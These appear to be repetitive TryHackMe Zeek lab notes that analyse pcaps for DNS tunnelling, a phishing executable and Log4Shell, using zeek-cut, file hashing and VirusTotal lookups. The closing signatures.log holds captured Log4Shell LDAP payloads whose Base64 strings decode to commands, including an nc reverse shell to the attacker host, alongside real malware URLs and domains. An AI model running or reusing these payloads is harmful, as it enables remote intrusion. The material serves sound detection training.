ZEEK EXERCISES

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head dns.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	trans_idrtt	query	qclass	qclass_name	qtype	qtype_name	rcode	rcode_name	AA	TC	RD	RA	Z	answers	TTLs	rejected
 #types	time	string	addr	port	addr	port	enum	count	interval	string	count	string	count	string	count	string	bool	bool	bool	bool	count	vector[string]	vector[interval]	bool
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	5374	0.855652	e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com	1	C_INTERNET	15	MX	0	NOERROR	F	F	T	T	0	3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com	58.000000	F

root@thm:~$ cat dns.log | zeek-cut qtype_name
 TXT
 CNAME
 MX
 AAAA
 ...

root@thm:~$ cat dns.log | zeek-cut qtype_name | grep AAAA | wc -l
 320

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head conn.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	service	duration	orig_bytes	resp_bytes	conn_state	local_orig	local_resp	missed_bytes	history	orig_pkts	orig_ip_bytes	resp_pkts	resp_ip_bytes	tunnel_parents
 #types	time	string	addr	port	addr	port	enum	string	interval	count	count	string	bool	bool	count	string	count	count	count	count	set[string]
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	dns	0.855652	80	175	SF	-	-	0	Dd	1	108	1	203-
 1623212925.678141	CglDT21NBa0XUHywyl	10.20.57.3	47888	10.10.2.22	53	udp	dns	0.158643	80	175	SF	-	-	0	Dd	1	108	1	203-

root@thm:~$ cat conn.log | zeek-cut duration
 0.658508
 0.360476
 0.039498
 ...

root@thm:~$ cat conn.log | zeek-cut duration | sort -n
 3.445874
 4.238265
 7.835490
 9.420791

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head dns.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	trans_idrtt	query	qclass	qclass_name	qtype	qtype_name	rcode	rcode_name	AA	TC	RD	RA	Z	answers	TTLs	rejected
 #types	time	string	addr	port	addr	port	enum	count	interval	string	count	string	count	string	count	string	bool	bool	bool	bool	count	vector[string]	vector[interval]	bool
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	5374	0.855652	e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com	1	C_INTERNET	15	MX	0	NOERROR	F	F	T	T	0	3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com	58.000000	F

root@thm:~$ cat dns.log | zeek-cut query
 db.rhodes.edu
 4542016cb16eb15fd56e1b16c4545111d7.cisco-update.com
 ...

root@thm:~$ cat dns.log | zeek-cut query |rev | cut -d '.' -f 1-2 | rev | sort | uniq
 _tcp.local
 cisco-update.com
 in-addr.arpa
 ip6.arpa
 rhodes.edu
 ubuntu.com
 
root@thm:~$ cat dns.log | zeek-cut query |rev | cut -d '.' -f 1-2 | rev | sort | uniq | wc -l
 6

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head conn.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	service	duration	orig_bytes	resp_bytes	conn_state	local_orig	local_resp	missed_bytes	history	orig_pkts	orig_ip_bytes	resp_pkts	resp_ip_bytes	tunnel_parents
 #types	time	string	addr	port	addr	port	enum	string	interval	count	count	string	bool	bool	count	string	count	count	count	count	set[string]
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	dns	0.855652	80	175	SF	-	-	0	Dd	1	108	1	203-
 1623212925.678141	CglDT21NBa0XUHywyl	10.20.57.3	47888	10.10.2.22	53	udp	dns	0.158643	80	175	SF	-	-	0	Dd	1	108	1	203-

root@thm:~$ cat conn.log | zeek-cut id.orig_h
 10.20.57.3
 10.20.57.3
 ...

root@thm:~$ cat conn.log | zeek-cut id.orig_h | sort | uniq
 10.20.57.3
 fe80::202a:f0b1:7d9c:bd9e

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CLYI4E3rTcU5VAMw51	HTTP	0	(empty)	text/plain	-	0.000000	-	F	14	14	0	0F-	-	-	-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	C0Bg3l4Y4wO1g2JNbl	HTTP	0	(empty)	application/msword	-	4.386569	-	F	323072	-	00F	-	-	-	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	COY5YG1s9ZuflGNT48	HTTP	0	PE	application/x-dosexec	-	0.498764	-	F	2437120	-	00F	-	-	-	-	-	-	-

root@thm:~$ cat files.log | zeek-cut tx_hosts rx_hosts mime_type filename
 23.63.254.163	10.6.27.102	text/plain	-
 107.180.50.162	10.6.27.102	application/msword	-
 107.180.50.162	10.6.27.102	application/x-dosexec	-

 * the online application that may look suspicious at first glance is the executable file

root@thm~:$ BROWSER > https://gchq.github.io/
 input: 10.6.27.102
 recipe: defang ip addresses
 output: 10[.]6[.]27[.]102

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ BROWSER > https://gchq.github.io/
 input: smart-fax.com
 recipe: defang url
 output: smart-fax[.]com

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
 * there will be new hashed fields the files.log file
 
root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CI5U2K3Zk6D31MnLp8	HTTP	0	SHA1,MD5	text/plain	-	0.000000	-	F	14	14	00	F	-	cd5a4d3fdd5bffc16bf959ef75cf37bc	33bf88d5b82df3723d5863c7d23445e345828904-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	Ch8wOn2b7M249xNQ12	HTTP	0	SHA1,MD5	application/msword	-	4.386569	-	F	323072	-0	0	F	-	b5243ec1df7d1d5304189e7db2744128	a66bd2557016377dfb95a87c21180e52b23d2e4e	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	Ce5njOG0IJsxzOL08	HTTP	0	SHA1,MD5,PE	application/x-dosexec	-	0.498764	-	F	2437120-0	0	F	-	cc28e40b46237ab6d5282199ef78c464	0d5c820002cf93384016bd4a2628dcc5101211f4	-	-	-	-

#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
 text/plain	cd5a4d3fdd5bffc16bf959ef75cf37bc
 application/msword	b5243ec1df7d1d5304189e7db2744128
 application/x-dosexec	cc28e40b46237ab6d5282199ef78c464

root@thm:~$ BROWSER > https://www.virustotal.com/
 search: b5243ec1df7d1d5304189e7db2744128
 relations > bundled files
  Bundled Files (41)
  Scanned     Detections     File type     Name
  2024-11-04  10/61          VBA           ThisDocument.cls
  2024-05-23   6/63          VBA
  2024-12-23   0/61          Text          PROJECTwm
  2024-11-08   0/62          ?             [1]CompObj
  2024-12-06   0/62          Text          VBA_P-code.txt

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
 * there will be new hashed fields the files.log file
 
root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CI5U2K3Zk6D31MnLp8	HTTP	0	SHA1,MD5	text/plain	-	0.000000	-	F	14	14	00	F	-	cd5a4d3fdd5bffc16bf959ef75cf37bc	33bf88d5b82df3723d5863c7d23445e345828904-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	Ch8wOn2b7M249xNQ12	HTTP	0	SHA1,MD5	application/msword	-	4.386569	-	F	323072	-0	0	F	-	b5243ec1df7d1d5304189e7db2744128	a66bd2557016377dfb95a87c21180e52b23d2e4e	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	Ce5njOG0IJsxzOL08	HTTP	0	SHA1,MD5,PE	application/x-dosexec	-	0.498764	-	F	2437120-0	0	F	-	cc28e40b46237ab6d5282199ef78c464	0d5c820002cf93384016bd4a2628dcc5101211f4	-	-	-	-

#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
 text/plain	cd5a4d3fdd5bffc16bf959ef75cf37bc
 application/msword	b5243ec1df7d1d5304189e7db2744128
 application/x-dosexec	cc28e40b46237ab6d5282199ef78c464

root@thm:~$ BROWSER > https://www.virustotal.com/
 search: cc28e40b46237ab6d5282199ef78c464
 detection: 
  749e161661290e8a2d190b1a66469744127bc25bf46e5d0c6f2e835f4b92db18
  PleaseWaitWindow.exe

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
 * there will be new hashed fields the files.log file
 
root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CI5U2K3Zk6D31MnLp8	HTTP	0	SHA1,MD5	text/plain	-	0.000000	-	F	14	14	00	F	-	cd5a4d3fdd5bffc16bf959ef75cf37bc	33bf88d5b82df3723d5863c7d23445e345828904-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	Ch8wOn2b7M249xNQ12	HTTP	0	SHA1,MD5	application/msword	-	4.386569	-	F	323072	-0	0	F	-	b5243ec1df7d1d5304189e7db2744128	a66bd2557016377dfb95a87c21180e52b23d2e4e	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	Ce5njOG0IJsxzOL08	HTTP	0	SHA1,MD5,PE	application/x-dosexec	-	0.498764	-	F	2437120-0	0	F	-	cc28e40b46237ab6d5282199ef78c464	0d5c820002cf93384016bd4a2628dcc5101211f4	-	-	-	-

#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
 text/plain	cd5a4d3fdd5bffc16bf959ef75cf37bc
 application/msword	b5243ec1df7d1d5304189e7db2744128
 application/x-dosexec	cc28e40b46237ab6d5282199ef78c464

root@thm:~$ BROWSER > https://www.virustotal.com/
 search: cc28e40b46237ab6d5282199ef78c464
 behavior > dns resolutiona
  DNS Resolutions
   dunlop.hopto.org
   query.prod.cms.rt.microsoft.com
   res.public.onecdn.static.microsoft
   www.microsoft.com
   125.21.88.13.in-addr.arpa
   
root@thm:~$ BROWSER > cyberchef.io
 input: hopto.org
 recipe: defang url
 output: hopto[.]org

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ cat signatures.log
 #fields	ts	uid	src_addr	src_port	dst_addr	dst_port	note	sig_id	event_msg	sub_msg	sig_count	host_count
 #types	time	string	addr	port	addr	port	enum	string	string	string	count	count
 1640023652.109820	CMzs07mEkv4GvJc68	192.168.56.102	389	172.17.0.2	36820	Signatures::Sensitive_Signature	log4j_javaclassname_tcp	192.168.56.102: log4j_javaclassname_tcp	0\x81\xc8\x02\x01\x02d\x81\xc2\x04-Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04\x0bobjectC...	-	-
 1640025554.665741	CO8DsW2tkhOb5990Vc	192.168.56.102	389	172.17.0.2	36822	Signatures::Sensitive_Signature	log4j_javaclassname_tcp	192.168.56.102: log4j_javaclassname_tcp	0\x81\xd0\x02\x01\x02d\x81\xca\x045Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04...	-	-
 1640026858.967970	CbpVAq3ecDRo6YocGj	192.168.56.102	389	172.17.0.2	36824	Signatures::Sensitive_Signature	log4j_javaclassname_tcp	192.168.56.102: log4j_javaclassname_tcp	0\x81\xe4\x02\x01\x02d\x81\xde\x04IBasic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://19...	-	-

